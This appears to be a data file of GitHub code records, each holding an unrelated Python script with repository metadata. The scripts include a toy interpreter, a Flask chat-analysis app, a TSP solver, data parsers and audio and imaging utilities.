size=alt.Size(\"rand\", legend=None, scale=alt.Scale(range=[1, 150])),\n ))\n","repo_name":"panaverse/learn-generative-ai","sub_path":"11_containers/01_local/01_containers/xx_deploy_streamlit/streamlit-app/streamlit_app.py","file_name":"streamlit_app.py","file_ext":"py","file_size_in_byte":1126,"program_lang":"python","lang":"en","doc_type":"code","stars":54,"dataset":"github-code","pt":"54"} +{"seq_id":"20376431287","text":"# # Write your solution here\ndef run(program):\n variables = {chr(ord('A') + i): 0 for i in range(26)}\n output = []\n\n def get_value(val):\n if val.isdigit():\n return int(val)\n else:\n return variables[val]\n\n line = 0\n while line < len(program):\n command = program[line].split()\n if command[0] == 'PRINT':\n output.append(get_value(command[1]))\n elif command[0] == 'MOV':\n variables[command[1]] = get_value(command[2])\n elif command[0] == 'ADD':\n variables[command[1]] += get_value(command[2])\n elif command[0] == 'SUB':\n 
variables[command[1]] -= get_value(command[2])\n elif command[0] == 'MUL':\n variables[command[1]] *= get_value(command[2])\n elif command[0] == 'IF':\n condition = f\"{get_value(command[1])} {command[2]} {get_value(command[3])}\"\n if not eval(condition):\n line += 1\n elif command[0] == 'JUMP':\n line = program.index(f\"{command[1]}::\") - 1\n elif command[0] == 'END':\n break\n\n line += 1\n\n return output\n\nif __name__ == '__main__':\n program1 = [\n \"MOV A 1\",\n \"MOV B 2\",\n \"PRINT A\",\n \"PRINT B\",\n \"ADD A B\",\n \"PRINT A\",\n \"END\"\n ]\n result1 = run(program1)\n print(result1) \n\n program2 = [\n \"MOV A 1\",\n \"MOV B 10\",\n \"begin:\",\n \"IF A >= B JUMP quit\",\n \"PRINT A\",\n \"PRINT B\",\n \"ADD A 1\",\n \"SUB B 1\",\n \"JUMP begin\",\n \"quit:\",\n \"END\"\n ]\n result2 = run(program2)\n print(result2) \n\n program3 = [\n \"MOV A 1\",\n \"MOV B 1\",\n \"begin:\",\n \"PRINT A\",\n \"ADD B 1\",\n \"MUL A B\",\n \"IF B <= 10 JUMP begin\",\n \"END\"\n ]\n result3 = run(program3)\n print(result3) \n\n program4 = [\n \"MOV N 50\",\n \"PRINT 2\",\n \"MOV A 3\",\n \"begin:\",\n \"MOV B 2\",\n \"MOV Z 0\",\n \"test:\",\n \"MOV C B\",\n \"new:\",\n \"IF C == A JUMP error\",\n \"IF C > A JUMP over\",\n \"ADD C B\",\n \"JUMP new\",\n \"error:\",\n \"MOV Z 1\",\n \"JUMP over2\",\n \"over:\",\n \"ADD B 1\",\n \"IF B < A JUMP test\",\n \"over2:\",\n \"IF Z == 1 JUMP over3\",\n \"PRINT A\",\n \"over3:\",\n \"ADD A 1\",\n \"IF A <= N JUMP begin\",\n ]\n result4 = run(program4)\n print(result4) \n\n","repo_name":"Athooh/mooc-programming-23","sub_path":"part07-18_own_programming_language/src/own_language.py","file_name":"own_language.py","file_ext":"py","file_size_in_byte":2505,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"32668520848","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon Oct 26 15:17:30 2020\n\n@author: trevor\n\"\"\"\nfrom segment.segment.segmenter import Analyzer\nimport csv\nt = Analyzer('anchor')\n\ninfile = 'data/output/domain_split_file.csv'\noutfile = 'data/output/final_df.csv'\nheaders = ['rank', 'domain', 'tld', 'registrar', 'whois_server', \n 'updated_date', 'creation_date', 'expiration_date', 'name_servers',\n 'dnssec', 'org', 'city', 'state', 'zipcode', 'country', 'trust',\n 'dom_split'] \n\ndef create_reader_writer(infile=infile, outfile=outfile):\n reader = csv.DictReader(infile)\n writer = csv.DictWriter(outfile, headers, extrasaction='ignore')\n return reader, writer\n\ndef split_domain(domain): return t.segment(domain)\n\ndef main(): \n with open(infile, 'r+') as inp, open(outfile, 'w+') as out:\n reader, writer = create_reader_writer(inp, out) \n writer.writeheader()\n for line in reader:\n domain = line['domain']\n print('Checking...{}'.format(domain))\n dom_split = split_domain(domain)\n line['dom_split'] = dom_split\n writer.writerow(line)\n \nmain()\n\n","repo_name":"tmcglynn01/disinformation","sub_path":"scripts/domain_split.py","file_name":"domain_split.py","file_ext":"py","file_size_in_byte":1194,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"26331042180","text":"# Estimate how much disk space is needed to store all comment data\n\nfrom html.parser import HTMLParser\nimport re\nimport requests\n\nclass MyHTMLParser(HTMLParser):\n\n\tdef handle_data(self, data):\n\t\tif (re.match('\\d{1,3}(,\\d{1,3})+', data)):\n\t\t\tsize = int(''.join(data.split(',')))\n\t\t\tglobal 
total_size\n\t\t\ttotal_size += size\n\nif __name__ == \"__main__\":\n\ttotal_size = 0\n\treddit_comments_data = 'http://files.pushshift.io/reddit/comments/'\n\thtml = requests.get(reddit_comments_data).content\n\tparser = MyHTMLParser()\n\tparser.feed(str(html))\n\tprint('total size of bz2 compressed reddit comment data: {0:.2f}G'.format(total_size / (10**9)))\n","repo_name":"mmxmb/reddit_comments_chatbot","sub_path":"misc/get_dump_size.py","file_name":"get_dump_size.py","file_ext":"py","file_size_in_byte":632,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"54"} +{"seq_id":"71669070242","text":"import re\n\n\ndef set_format(fall_datas, admission):\n for fall_data in fall_datas:\n data_type = fall_data[\"type\"]\n data = fall_data[\"data\"]\n title = data.get(\"title\", None)\n\n if data_type == \"NestedTitleValue\":\n top_title = data[\"topTitleValue\"]\n title = top_title[\"title\"]\n\n if title == \"Overall Admission Rate\":\n percentage, num, pre_num = get_per_and_num_and_pre_num(top_title[\"value\"][0])\n\n admission.update({\n \"acceptance_pct_overall\": percentage,\n \"applicant_overall_count\": num\n })\n\n for child in data[\"children\"]:\n if child[\"title\"] == \"Women\":\n p, n, pn = get_per_and_num_and_pre_num(child[\"value\"][0])\n\n admission.update({\n \"acceptance_pct_w\": p,\n \"applicant_w_count\": n\n })\n elif child[\"title\"] == \"Men\":\n p, n, pn = get_per_and_num_and_pre_num(child[\"value\"][0])\n\n admission.update({\n \"acceptance_pct_m\": p,\n \"applicant_m_count\": n\n })\n elif title == \"Students Enrolled\":\n sp, sn, spn = get_per_and_num_and_pre_num(top_title[\"value\"][0])\n\n admission.update({\n \"yield_pct_overall\": sp,\n \"admitted_overall_count\": sn,\n \"enrolled_overall_count\": spn\n })\n\n for child in data[\"children\"]:\n if child[\"title\"] == \"Women\":\n p, n, pn = get_per_and_num_and_pre_num(child[\"value\"][0])\n\n admission.update({\n \"enrolled_w_count\": pn,\n \"yield_pct_w\": p,\n \"admitted_w_count\": n\n })\n elif child[\"title\"] == \"Men\":\n p, n, pn = get_per_and_num_and_pre_num(child[\"value\"][0])\n\n admission.update({\n \"enrolled_m_count\": pn,\n \"yield_pct_m\": p,\n \"admitted_m_count\": n\n })\n elif title == \"Students Offered Wait List\":\n admission.update({\n \"waitlist_offered_count\": int(data[\"value\"][0].replace(\",\", \"\"))\n })\n elif title == \"Students Accepting Wait List Position\":\n admission.update({\n \"waitlist_accepted_count\": int(data[\"value\"][0].replace(\",\", \"\"))\n })\n elif title == \"Students Admitted From Wait List\":\n admission.update({\n \"waitlist_admitted_count\": int(data[\"value\"][0].replace(\",\", \"\"))\n })\n elif data_type == \"BarGraph\":\n if title == \"\":\n for grade in data[\"data\"]:\n if grade[\"label\"] == \"3.75 and Above\":\n admission.update({\n \"gpa375_pct\": grade[\"value\"]\n })\n elif grade[\"label\"] == \"3.50 - 3.74\":\n admission.update({\n \"gpa350_pct\": grade[\"value\"]\n })\n elif grade[\"label\"] == \"3.25 - 3.49\":\n admission.update({\n \"gpa325_pct\": grade[\"value\"]\n })\n elif grade[\"label\"] == \"3.00 - 3.24\":\n admission.update({\n \"gpa300_pct\": grade[\"value\"]\n })\n elif grade[\"label\"] == \"2.50 - 2.99\":\n admission.update({\n \"gpa250_pct\": grade[\"value\"]\n })\n elif grade[\"label\"] == \"2.00 - 2.49\":\n admission.update({\n \"gpa200_pct\": grade[\"value\"]\n })\n elif \"SAT Math\" in title:\n a, n, x = get_average_and_range(title)\n\n admission.update({\n \"avg_sat_math\": a,\n 
\"avg_sat_math_min\": n,\n \"avg_sat_math_max\": x\n })\n\n for level in data[\"data\"]:\n label = level[\"label\"]\n\n if \"700 - 800\" in label:\n admission.update({\n \"sat_math700_pct\": level[\"value\"]\n })\n elif \"600 - 700\" in label:\n admission.update({\n \"sat_math600_pct\": level[\"value\"]\n })\n elif \"500 - 600\" in label:\n admission.update({\n \"sat_math500_pct\": level[\"value\"]\n })\n elif \"400 - 500\" in label:\n admission.update({\n \"sat_math400_pct\": level[\"value\"]\n })\n elif \"300 - 400\" in label:\n admission.update({\n \"sat_math300_pct\": level[\"value\"]\n })\n elif \"200 - 300\" in label:\n admission.update({\n \"sat_math200_pct\": level[\"value\"]\n })\n elif \"SAT EBRW\" in title:\n a, n, x = get_average_and_range(title)\n\n admission.update({\n \"avg_sat_e\": a,\n \"avg_sat_english_min\": n,\n \"avg_sat_english_max\": x\n })\n\n for level in data[\"data\"]:\n label = level[\"label\"]\n\n if \"700 - 800\" in label:\n admission.update({\n \"sat_english700_pct\": level[\"value\"]\n })\n elif \"600 - 700\" in label:\n admission.update({\n \"sat_english600_pct\": level[\"value\"]\n })\n elif \"500 - 600\" in label:\n admission.update({\n \"sat_english500_pct\": level[\"value\"]\n })\n elif \"400 - 500\" in label:\n admission.update({\n \"sat_english400_pct\": level[\"value\"]\n })\n elif \"300 - 400\" in label:\n admission.update({\n \"sat_english300_pct\": level[\"value\"]\n })\n elif \"200 - 300\" in label:\n admission.update({\n \"sat_english200_pct\": level[\"value\"]\n })\n else:\n a, n, x = get_average_and_range(title)\n\n admission.update({\n \"avg_act\": a,\n \"avg_act_min\": n,\n \"avg_act_max\": x\n })\n\n for level in data[\"data\"]:\n label = level[\"label\"]\n\n if \"36\" in label:\n admission.update({\n \"avg_act30_pct\": level[\"value\"]\n })\n elif \"29\" in label:\n admission.update({\n \"avg_act24_pct\": level[\"value\"]\n })\n elif \"23\" in label:\n admission.update({\n \"avg_act18_pct\": level[\"value\"]\n })\n elif \"17\" in label:\n admission.update({\n \"avg_act12_pct\": level[\"value\"]\n })\n elif \"11\" in label:\n admission.update({\n \"avg_act6_pct\": level[\"value\"]\n })\n else:\n admission.update({\n \"avg_act0_pct\": level[\"value\"]\n })\n elif title == \"High School Class Rank\":\n for level in data[\"value\"]:\n pct_pattern = r\"[0-9]+(?=\\%)\"\n if re.search(pct_pattern, level) is not None:\n pct = int(re.search(pct_pattern, level).group())\n else:\n pct = None\n\n if \"tenth\" in level:\n admission.update({\n \"hs_rank_10_pct\": pct\n })\n elif \"quarter\" in level:\n admission.update({\n \"hs_rank_25_pct\": pct\n })\n else:\n admission.update({\n \"hs_rank_50_pct\": pct\n })\n elif title == \"National Merit Scholar\":\n admission.update({\n \"national_merit_pct\": get_percent_in_no_reported(data[\"value\"][0])\n })\n elif title == \"Valedictorian\":\n admission.update({\n \"valedictorian_pct\": get_percent_in_no_reported(data[\"value\"][0])\n })\n elif title == \"Class President\":\n admission.update({\n \"class_president_pct\": get_percent_in_no_reported(data[\"value\"][0])\n })\n elif title == \"Student Government Officer\":\n admission.update({\n \"student_gov_pct\": get_percent_in_no_reported(data[\"value\"][0])\n })\n\n\ndef get_per_and_num_and_pre_num(string):\n string = string.replace(\" \", \"\").replace(\",\", \"\")\n per_pattern = r\"[0-9]+(?=\\%)\"\n if re.search(per_pattern, string) is not None:\n percentage = int(re.search(per_pattern, string).group())\n else:\n percentage = None\n\n num_pattern = 
r\"(?<=of)[0-9]+\"\n if re.search(num_pattern, string) is not None:\n num = int(re.search(num_pattern, string).group().replace(',', ''))\n else:\n num = None\n\n pre_num_pattern = r\"[0-9,]+(?=\\([0-9]+%\\))\"\n if re.search(pre_num_pattern, string) is not None:\n pre_num = int(re.search(pre_num_pattern, string).group().replace(',', ''))\n else:\n pre_num = None\n\n return percentage, num, pre_num\n\n\ndef get_average_and_range(string):\n avg_pattern = r\"[0-9]+(?=\\saverage)\"\n if re.search(avg_pattern, string) is not None:\n avg = int(re.search(avg_pattern, string).group())\n else:\n avg = None\n\n range_pattern = r\"[0-9]{3}\\-[0-9]{3}\"\n if re.search(range_pattern, string) is not None:\n rang = re.search(range_pattern, string).group().split(\"-\")\n mini = int(rang[0])\n maxi = int(rang[1])\n else:\n mini = None\n maxi = None\n \n return avg, mini, maxi\n\n\ndef get_percent_in_no_reported(string):\n pattern = r\"[0-9]{1,3}(?=\\%)\"\n if re.search(pattern, string) is not None:\n return re.search(pattern, string).group()\n else:\n return 0\n","repo_name":"balcen/college-crawler","sub_path":"admission/profile_of_fall_admission.py","file_name":"profile_of_fall_admission.py","file_ext":"py","file_size_in_byte":11242,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"69806433123","text":"from setuptools import setup, find_packages\n\ndescription = \\\n\"\"\"A multi-wavelength SED model based on radiative transfer simulations and\ndeep learning\"\"\"\n\ninstall_requires = [\n 'astropy>=3',\n 'numpy>=1.17',\n 'astro-sedpy>=0.2',\n 'torch>=1.9',\n 'tqdm',\n]\n\n# Get version\nexec(open('starduster/version.py', 'r').read())\n\nsetup(\n name='starduster',\n version=__version__,\n author=\"Yisheng Qiu\",\n author_email=\"hpc_yqiuu@163.com\",\n description=description,\n license=\"GPLv3\",\n url='https://github.com/yqiuu/starduster',\n install_requires=install_requires,\n packages=find_packages(),\n include_package_data=True,\n)\n","repo_name":"rseng/rsepedia-analysis","sub_path":"_repos/github/yqiuu/starduster/setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":651,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"54"} +{"seq_id":"11185354955","text":"import pyaudio\nimport wave\nimport os\nfrom output import Output\nfrom settings import SAMPLE_RATE, SAMPLE_WIDTH, BUFFER_SIZE\nfrom mixer import MonoMixer, PolyMixer\nfrom tkinter import *\nfrom keys import map_keys\nfrom presets import *\n\n\nos.system('xset r off')\n\np = pyaudio.PyAudio()\nmixer = MonoMixer(SMOOTH)\nmixer.controller.portamento.value = 100.0\nout = Output(mixer)\n\ntk_root = Tk()\nmap_keys(tk_root, mixer.controller)\n\nsave_wav = True\n\nif save_wav:\n file = wave.open('output.wav', 'wb')\n file.setframerate(SAMPLE_RATE)\n file.setsampwidth(SAMPLE_WIDTH)\n file.setnchannels(1)\n\n\ndef callback(input_data, frame_count, time_info, status):\n data = out.get_chunk(frame_count)\n if save_wav:\n file.writeframes(data)\n return data, pyaudio.paContinue\n\n\nstream = p.open(format=p.get_format_from_width(SAMPLE_WIDTH),\n channels=1,\n rate=SAMPLE_RATE,\n frames_per_buffer=BUFFER_SIZE,\n output=True,\n stream_callback=callback,\n )\n\nstream.start_stream()\ntk_root.mainloop()\n\n\n\n#while stream.is_active():\n# pitch = float(input(\"...\"))\n# mixer.note_on(100, pitch)\n# input(\"...\")\n# mixer.note_off()\n\n\nstream.stop_stream()\nstream.close()\nos.system('xset r on')\n\nif save_wav:\n 
file.close()\n\np.terminate()\n","repo_name":"ieaalto/Mokkihoperyys","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1316,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"2581634745","text":"# This Python 3 environment comes with many helpful analytics libraries installed\n# It is defined by the kaggle/python docker image: https://github.com/kaggle/docker-python\n# For example, here's several helpful packages to load in \n\nimport numpy as np # linear algebra\nimport csv\nimport sklearn.cluster as skcluster\nfrom functools import partial\nfrom collections import Counter\nfrom concorde.tsp import TSPSolver\nimport operator\nfrom itertools import islice\n\ndef is_prime(limit):\n limitn = limit\n not_prime = set()\n primes = [0,0]\n\n for i in range(2, limitn):\n if i in not_prime:\n primes.append(0)\n continue\n\n for f in range(i*2, limitn, i):\n not_prime.add(f)\n\n primes.append(1)\n\n return np.array(primes)\n \ndef make_submission(filename, path):\n with open(filename, 'w', newline='') as file:\n writer = csv.writer(file)\n writer.writerow(['Path'])\n writer.writerows([p] for p in path)\n \ndef load_csv(filename, limit=None):\n with open(filename, newline='') as input_file:\n reader = csv.reader(input_file)\n next(reader) #Skip headers\n it = islice(reader, limit) if limit else reader\n return np.array([[float(x)*1000, float(y)*1000] for _, x, y in it])\n \ndef scoring_function(data):\n penalized = is_prime(len(data))\n coords = (data[:,0] + 1j * data[:,1])\n def score_path(path):\n dist = np.abs(np.diff(coords[path]))\n penalty = 0.1 * np.sum(dist[9::10] * penalized[path[9:-1:10]])\n dist = np.sum(dist)\n return dist + penalty\n return score_path\n\ndef estimate_edges(k, samples): \n \"Estimate the number of edges for k clusters of the data\"\n per_cluster = samples // k\n if per_cluster == 1:\n return k**2\n return per_cluster ** 2 * k + (2*k+1)**2\n \ndef cluster_data(data, n_clusters, min_nodes=1):\n nodes = 0\n while nodes < min_nodes: \n clusterer = skcluster.MiniBatchKMeans(n_clusters= n_clusters, init_size= n_clusters*3)\n labels =clusterer.fit_predict(data)\n nodes = min(Counter(labels).values())\n centroids = clusterer.cluster_centers_\n return labels, centroids\n \ndef concorde_solve(nodes, norm='EUC_2D', **kwargs):\n return TSPSolver.from_data(*nodes.T, norm=norm).solve(**kwargs)\n \n\n#Test run on fewer cities, set to None to use all data\nlimit = None\nmain_time_limit = 300\nclusters_time_limit = 60\n\n#Load data\ndata = load_csv('../input/cities.csv', limit=limit)\n \nm = len(data)\nscore_path = scoring_function(data)\nindices = np.arange(m)\n\nestimate_edges = partial(estimate_edges, samples = m)\n\n#Compute k such that the number of edges between cities is minimized\nn_clusters = sorted(range(1,m//2), key= estimate_edges)[0]\nprint(f\"number of clusters: {n_clusters}, expected edges: {estimate_edges(n_clusters):,d}\")\n\n#Cluster the data into n_clusters using MiniBatchKmeans, make sure each clustr has at least 10 cities\nlabels, centroids = cluster_data(data[1:], n_clusters, min_nodes=1)\nlabels = np.insert(labels+1, 0, 0, axis=0)\ncentroids = np.insert(centroids, 0, data[0], axis=0)\n\nprint(len(centroids))\nprint('Solving TSP for main tour')\nconcorde_sol = concorde_solve(centroids, time_bound=main_time_limit)\nassert concorde_sol.found_tour\ntour = concorde_sol.tour\n\npath = [0]\n\nfor i, cluster_idx in enumerate(tour[1:],1):\n print(f'{i} of {n_clusters}: Solving tsp for 
cluster {cluster_idx}')\n cluster = data[labels==cluster_idx]\n sort = sorted(range(len(cluster)), key=lambda n: (cluster[n][0], cluster[n][1]))\n cluster = cluster[sort]\n idx = indices[labels==cluster_idx][sort]\n \n solution = concorde_solve(cluster, time_bound=clusters_time_limit)\n assert solution.found_tour\n cluster_tour = solution.tour\n path.extend(idx[cluster_tour])\n \npath.append(0)\n\n# Make sure every city is visited once (except for the north pole)\nassert len(set(path)) == len(data)\nscore = score_path(path) / 1000\n\nmake_submission('submission.csv', path)\n","repo_name":"sajedjalil/Data-Science-Pipeline-Detector","sub_path":"dataset/traveling-santa-2018-prime-paths/gab/batched-santa.py","file_name":"batched-santa.py","file_ext":"py","file_size_in_byte":4011,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"54"} +{"seq_id":"33133839671","text":"import os\nimport json\nfrom datetime import datetime\nfrom flask import render_template, flash, redirect, url_for, request, g, \\\n jsonify, current_app\nfrom app.main.forms import FacebookChatUpload\nfrom app.main import bp\nfrom app.classes import Person, Reaction, ReactCounter\nfrom app.helper import react_classifier, react_compare, react_chart_row_filler\nfrom werkzeug.utils import secure_filename\nimport boto3\n\n\n@bp.route('/', methods=['GET', 'POST'])\n@bp.route('/home', methods=['GET', 'POST'])\ndef home():\n # s3 = boto3.client(\n # \"s3\",\n # aws_access_key_id=current_app.config['ACCESS_KEY'],\n # aws_secret_access_key=current_app.config['SECRET_ACCESS_KEY']\n # )\n # bucket_resource = s3\n form = FacebookChatUpload()\n if form.validate_on_submit():\n filenames = []\n names = request.files.getlist(form.json_facebook_file.name)\n for file in form.json_facebook_file.data:\n # kicks out if files is not json (very weak)\n if 'json'not in str(file.filename):\n return redirect(url_for('main.readme'))\n file_names = secure_filename(file.filename)\n bleh = file.stream.read()\n stringbleh = bleh.decode(\"utf-8\")\n print(os.path.join(current_app.config['UPLOAD_FOLDER'], file_names))\n with open(os.path.join(current_app.config['UPLOAD_FOLDER'], file_names), 'w') as json_file:\n json.dump(stringbleh, json_file)\n # bucket_resource.upload_file(\n # Bucket=current_app.config['FLASKS3_BUCKET_NAME'],\n # Filename=os.path.join(current_app.config['UPLOAD_FOLDER'], file_names),\n # Key=str(current_app.config['RANDOM_DIRECTORY'])+'/'+file_names\n # )\n\n return redirect(url_for('main.results'))\n return render_template('home.html', title='Home', form=form)\n\n\n@bp.route('/readme', methods=['GET', 'POST'])\ndef readme():\n return render_template('readme.html', title='How to Use')\n\n\n@bp.route('/results', methods=['GET', 'POST'])\ndef results():\n list_of_people = []\n list_results = []\n messages = None\n messages = []\n react_types = ['thumbs_up', 'angry', 'wow', 'laugh', 'cry', 'heart']\n\n for filename in os.listdir(current_app.config['UPLOAD_FOLDER']):\n with open(os.path.join(current_app.config['UPLOAD_FOLDER'], filename)) as json_file:\n stringdata = json.load(json_file)\n data = json.loads(stringdata)\n participants = data[\"participants\"]\n messages = messages + data['messages']\n # getting list of participants across all files.\n for member in participants:\n list_of_people.append(member.get('name'))\n list_of_people = list(set(list_of_people))\n os.remove(os.path.join(current_app.config['UPLOAD_FOLDER'], filename))\n for person in list_of_people:\n profile = Person(person)\n 
list_results.append(profile)\n # looping over messages in n^2 :<\n for message in messages:\n for each in list_results:\n if message.get('sender_name') in each.id:\n if message.get('content') or message.get('photos') or message.get('videos') or message.get(\n 'gifs') or message.get('sticker') or message.get('audio_files') or message.get('files'):\n # updating how many messages were sent\n each.up_comments()\n reacts = message.get('reactions')\n temp_counter = ReactCounter()\n if reacts:\n for react in reacts:\n cur_react = react_classifier(react.get('reaction'))\n temp_counter.add_count(cur_react)\n # update number of reacts received\n y = getattr(each, cur_react)\n y.up_received()\n # updating how many reacts someone has sent\n for listee in list_results:\n if react.get('actor') in listee.id:\n actor_react = getattr(listee, cur_react)\n actor_react.up_given()\n for each_type in react_types:\n # setting new top comment for each react type\n if react_compare(each, temp_counter, each_type):\n x = getattr(getattr(each, each_type))\n setattr(x, 'top_comment', message.get('content'))\n else:\n # update how many messages were deleted\n each.up_deleted()\n\n # os.remove(os.path.join(current_app.config['UPLOAD_FOLDER'], filename))\n\n member_values = []\n heart_values = []\n laugh_values = []\n wow_values = []\n cry_values = []\n angry_values = []\n thumbs_up_values = []\n thumbs_down_values = []\n pie_delete_values = []\n pie_messages_values = []\n for each in list_results:\n member_values.append(each.id)\n heart_values.append(each.heart.num_received)\n laugh_values.append(each.laugh.num_received)\n wow_values.append(each.wow.num_received)\n cry_values.append(each.cry.num_received)\n angry_values.append(each.angry.num_received)\n thumbs_up_values.append(each.thumbs_up.num_received)\n thumbs_down_values.append(each.thumbs_down.num_received)\n pie_delete_values.append(each.num_deleted)\n pie_messages_values.append(each.num_comments)\n\n return render_template('result.html', title='Your Chat', member_values=member_values, heart_values=heart_values,\n laugh_values=laugh_values, wow_values=wow_values, cry_values=cry_values,\n angry_values=angry_values, thumbs_up_values=thumbs_up_values,\n thumbs_down_values=thumbs_down_values, pie_messages_values=pie_messages_values,\n pie_delete_values=pie_delete_values, len=len(member_values))\n","repo_name":"snyoon/facebook_chat_data_tool","sub_path":"app/main/routes.py","file_name":"routes.py","file_ext":"py","file_size_in_byte":6092,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"38900901083","text":"import numpy as np\n\n# COLA\nimport ColaOpen3D as o4d\n\n\ndef voxel_downsample_with_label(pts, labels, voxel_size):\n \"\"\"\n pts: Nx3 ndarray\n labels: Nx1 ndarray\n \"\"\"\n pcd = o4d.geometry.ColaPointCloud(pts)\n tree = o4d.geometry.KDTreeFlann(pcd.data)\n\n pcd_down = pcd.voxel_down_sample(voxel_size=voxel_size)\n \n # get label\n pts_down = np.asarray(pcd_down.arr)\n labels_down = np.zeros(len(pts_down), dtype=np.int32)\n for i, query in enumerate(pts_down):\n query = query.reshape(3, -1)\n idx = tree.search_knn_vector_3d(query=query, knn=1)[1][0]\n labels_down[i] = labels[idx]\n \n return pts_down, labels_down \n\n","repo_name":"shaochengyan/ColaLib","sub_path":"ColaPCDUtils/downsample_utils.py","file_name":"downsample_utils.py","file_ext":"py","file_size_in_byte":666,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} 
+{"seq_id":"13865251312","text":"'''\nviewer.py: part of the niftidrop package\n\n'''\nimport os\nfrom niftidrop.templates import get_template, add_string, save_template\nfrom niftidrop.utils import get_random_name, get_extension\nfrom niftidrop.browser import view\n\n\n\"\"\"\ngenerate\n\nwill generate a niftidrop viewer to run locally or on a webserver\n\nviewer_input: dictionary with {\"nifti.nii.gz\":\"nidm.ttl\"}, with full paths. \n Paths should be relative to a web_root if view = False, or full paths\n to files on the local system if view=True.\nbase_image: The base image to use for the viewer. Not specifying a base_image will\n yield a black background. The same standard applies for the path as \n for image_paths.\nview: open a temporary web browser (to run locally). If True, images will be copied\n to a temp folder. If False, image_paths must be relative to web server. File names \n should be unique. \n\n\"\"\"\ndef generate(viewer_input,base_image,view_in_browser=True,bootstrap=True,template_choice=\"index\"):\n\n template = get_template(template_choice) \n\n if view_in_browser==True:\n new_viewer_input = generate_temp(viewer_input)\n new_image_paths = new_viewer_input.keys()\n new_nidm_paths = new_viewer_input.values()\n new_base_image = generate_temp({base_image:base_image})\n template = add_string(\"[SUB_SERVERIMAGES_SUB]\",str(new_image_paths),template)\n template = add_string(\"[SUB_SERVERNIDMS_SUB]\",str(new_nidm_paths),template)\n template = add_string(\"[SUB_BASEIMAGE_SUB]\",str(new_base_image.keys()[0]),template)\n new_paths = new_image_paths + new_nidm_paths + new_base_image.keys() \n real_paths = viewer_input.keys() + viewer_input.values() + [base_image] \n url_vars = \"?file=%s\" %(new_viewer_input.values()[0]) \n view(template,real_paths,new_paths,url_vars)\n\n else:\n if bootstrap:\n template = template.split(\"\\n\")\n template = get_bootstrap() + template\n template = \"\\n\".join(template)\n template = add_string(\"[SUB_SERVERIMAGES_SUB]\",str(viewer_input.keys()),template)\n template = add_string(\"[SUB_SERVERNIDMS_SUB]\",str(viewer_input.values()),template)\n template = add_string(\"[SUB_BASEIMAGE_SUB]\",base_image,template)\n return template\n\ndef generate_temp(viewer_input):\n # Here we will generate a lookup of temporary files\n new_viewer_input = dict()\n for image_path,nidm_path in viewer_input.iteritems():\n image_ext = get_extension(image_path)\n nidm_ext = get_extension(nidm_path) \n temp_path = get_random_name()\n temp_nidm_path = \"%s.%s\" %(temp_path,nidm_ext)\n temp_image_path = \"%s.%s\" %(temp_path,image_ext)\n new_viewer_input[temp_image_path] = temp_nidm_path\n return new_viewer_input \n\ndef get_bootstrap():\n return ['','','']\n","repo_name":"vsoch/nifti-drop","sub_path":"niftidrop/viewer.py","file_name":"viewer.py","file_ext":"py","file_size_in_byte":3154,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"54"} +{"seq_id":"25030281926","text":"from string import ascii_letters\n\ndef solution():\n\trl = open(0).readline\n\tpriority_map = '_' + ascii_letters\n\tresult = 0\n\n\twhile True:\n\t\tgroup = [set(rl().strip()) for _ in range(3)]\n\t\tif not group[0]:\n\t\t\tbreak\n\n\t\tdup = group[0] & group[1] & group[2]\n\t\tresult += priority_map.find(*dup)\n\n\treturn result\n\nprint(solution())\n","repo_name":"qyurila/advent-of-code-solution","sub_path":"2022/Day 3 - Rucksack 
Reorganization/part02.py","file_name":"part02.py","file_ext":"py","file_size_in_byte":322,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"3327951035","text":"#Importing Libraries\r\nimport pandas as pd \r\nimport numpy as np\r\nimport matplotlib.pyplot as plt\r\nimport seaborn as sb\r\n\r\n#Importing dataset\r\ndf=pd.read_csv('Data/Real-Data/Real_combine.csv')\r\n\r\n#cgecking for null values\r\nsb.heatmap(df.isnull(),yticklabels=False,cmap='viridis')\r\n\r\n#droping null values\r\ndf=df.dropna()\r\n\r\n#plotting pairwise relationship between dataset\r\nsb.pairplot(df)\r\n\r\n#checking correlation\r\na=df.corr()\r\n\r\n#splitting datasets\r\nX=df.iloc[:,:-1]\r\ny=df.iloc[:,-1].values\r\ny=y.reshape(-1,1)\r\n\r\n#handling missing vlaues(0 in pm2.5)\r\nfrom sklearn.impute import SimpleImputer\r\nim=SimpleImputer(missing_values=0,strategy='mean')\r\nim=im.fit(y)\r\ny=im.transform(y)\r\n\r\n#feature selection\r\nfrom sklearn.tree import ExtraTreeRegressor\r\nmodel=ExtraTreeRegressor()\r\nmodel.fit(X,y)\r\nprint(model.feature_importances_)\r\nfeat_imp=pd.Series(model.feature_importances_,index=X.columns)\r\nfeat_imp.nlargest(5).plot(kind='barh')#picking 5 columns that are in corelations with pm2.5\r\nplt.show()\r\n\r\nfrom sklearn.model_selection import train_test_split\r\nX_train,X_test,y_train,y_test=train_test_split(X,y,test_size=0.3)\r\n\r\nfrom sklearn.ensemble import RandomForestRegressor\r\nreg=RandomForestRegressor()\r\nreg.fit(X_train,y_train)\r\ny_pred=reg.predict(X_test)\r\n\r\nprint('r^2 value of train set:',reg.score(X_train,y_train))\r\nprint('r^2 value of test set:',reg.score(X_test,y_test))\r\n#plotting\r\nsb.distplot(y_test-y_pred)\r\n\r\nfrom sklearn.model_selection import 